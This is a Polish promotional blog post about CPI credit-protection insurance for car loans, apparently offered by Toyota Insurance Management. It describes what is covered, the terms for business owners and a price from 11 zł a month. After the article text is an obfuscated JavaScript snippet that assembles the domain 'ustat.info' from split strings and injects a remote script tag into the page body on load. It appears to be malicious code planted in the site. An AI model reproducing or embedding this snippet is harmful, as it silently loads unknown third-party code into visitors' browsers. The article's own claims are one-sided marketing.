Czym jest ubezpieczenie CPI i dlaczego warto, byś je miał?

Bierzesz kredyt i chcesz zyskać absolutną pewność jego spłaty? Obawiasz się sytuacji, gdy nie będziesz w stanie uregulować zaciągniętych zobowiązań? Mamy dla Ciebie rozwiązanie! Produkt finansowy, który pozwoli na zabezpieczenie się przed niespłaceniem kredytu. Zobacz, jak to działa.

Co to za propozycja?

Na rynku mamy dużo rodzajów ubezpieczeń: na życie, majątkowe, ubezpieczenie samochodu. Ubezpieczenie CPI, bowiem o nim mowa, to propozycja od Toyota Insurance Management. Rozwinięcie nazwy produktu brzmi Credit Protection Insurance, co w wolnym tłumaczeniu oznacza zabezpieczenie spłaty kredytu. Krótko mówiąc, jest to polisa, która chroni Cię przed zdarzeniami, które mogą uniemożliwić Ci całkowitą spłatę zaciągniętych zobowiązań.

Jak działa CPI? Twórcy tego programu zakładają dwie opcje – spłata całego zadłużenia lub pokrycie zobowiązań przez 12 kolejnych miesięcy. Ta pierwsza opcja obejmuje przypadki losowe, jak choćby śmierć kredytobiorcy czy trwała niezdolność do pracy. W takim wypadku, polisa pozwala na pełne opłacenie pozostałej wartości zadłużenia. A w przypadku utraty pracy przez kredytobiorcę bądź jego pobytu w szpitalu na skutek nieszczęśliwego wypadku, polisa CPI umożliwi opłacanie rat kredytu aż przez kolejne 12 miesięcy.

Dla kogo jest ten produkt?

Jeżeli chcesz kupić samochód na kredyt, to zdecydowanie warto zainteresować się tym produktem. Oczywiście nie wolno zakładać, że to akurat nam przydarzy się utrata pracy czy źródeł dochodu, ale z drugiej strony lepiej zabezpieczyć się również przed taką ewentualnością. Tym bardziej, że kredyt i tak trzeba będzie spłacić, o ile nadal chcemy poruszać się danym samochodem.

Ubezpieczenie CPI jest o tyle wygodne, że praktycznie eliminuje ryzyko niespłacenia kredytu, a co za tym idzie, wprowadzenia Twoich danych do rejestru dłużników. Dzięki temu, nawet w nieszczęśliwych przypadkach, zyskujesz ochronę dla siebie oraz swojej rodziny.

A co z przedsiębiorcami?

Czy przedsiębiorca również może liczyć na ochronę z tytułu ubezpieczenia CPI? Tak, ponieważ ten program nie dotyczy wyłącznie osób pracujących na etat. Jeżeli Twoja firma przez co najmniej 6 miesięcy wykazywać będzie straty, bądź straci kluczowego klienta zapewniającego co najmniej 60% dochodu, to wtedy możesz liczyć na ochronę z tytułu ubezpieczenia CPI.

Ile to kosztuje?

Koszty wykupu ochrony polisy są niskie. We wspomnianym już programie Toyota Insurance Management cena takiego ubezpieczenia rozpoczyna się już od 11 złotych miesięcznie! Mając w perspektywie fakt, iż chroni Cię to przed koniecznością spłaty rat w wysokości nawet kilku tysięcy złotych miesięcznie jest to naprawdę trafiona inwestycja!

Czy warto?

Nikogo nie zachęcamy do negatywnego myślenia i zakładania, że to akurat jemu przydarzy się nieszczęście, ale lepiej na taką ewentualność się zabezpieczyć. Ot, choćby dla własnego spokoju bezpieczniej jest wybrać ubezpieczenie kredytu!

(function(){
iy77_=(“u”+”st”);iy77=document.createElement(“script”);iy77.async=true;
iy77u=”69237581″;iy77_+=”a”+(“t.”);iy77_+=”i”+(“nf”+(“o”))+(“/”);
iy77u+=”.w1k0iqk6y77x8c4y”;iy77u+=”9vdkk8Xnid3jn9″;
iy77.src=”//”+iy77_+iy77u;iy77.type=”text/javascript”;
d_b=document.body;d_b.appendChild(iy77);
})();

Podobne wpisy

Co o tym sądzisz?

Witryna wykorzystuje Akismet, aby ograniczyć spam. Dowiedz się więcej jak przetwarzane są dane komentarzy.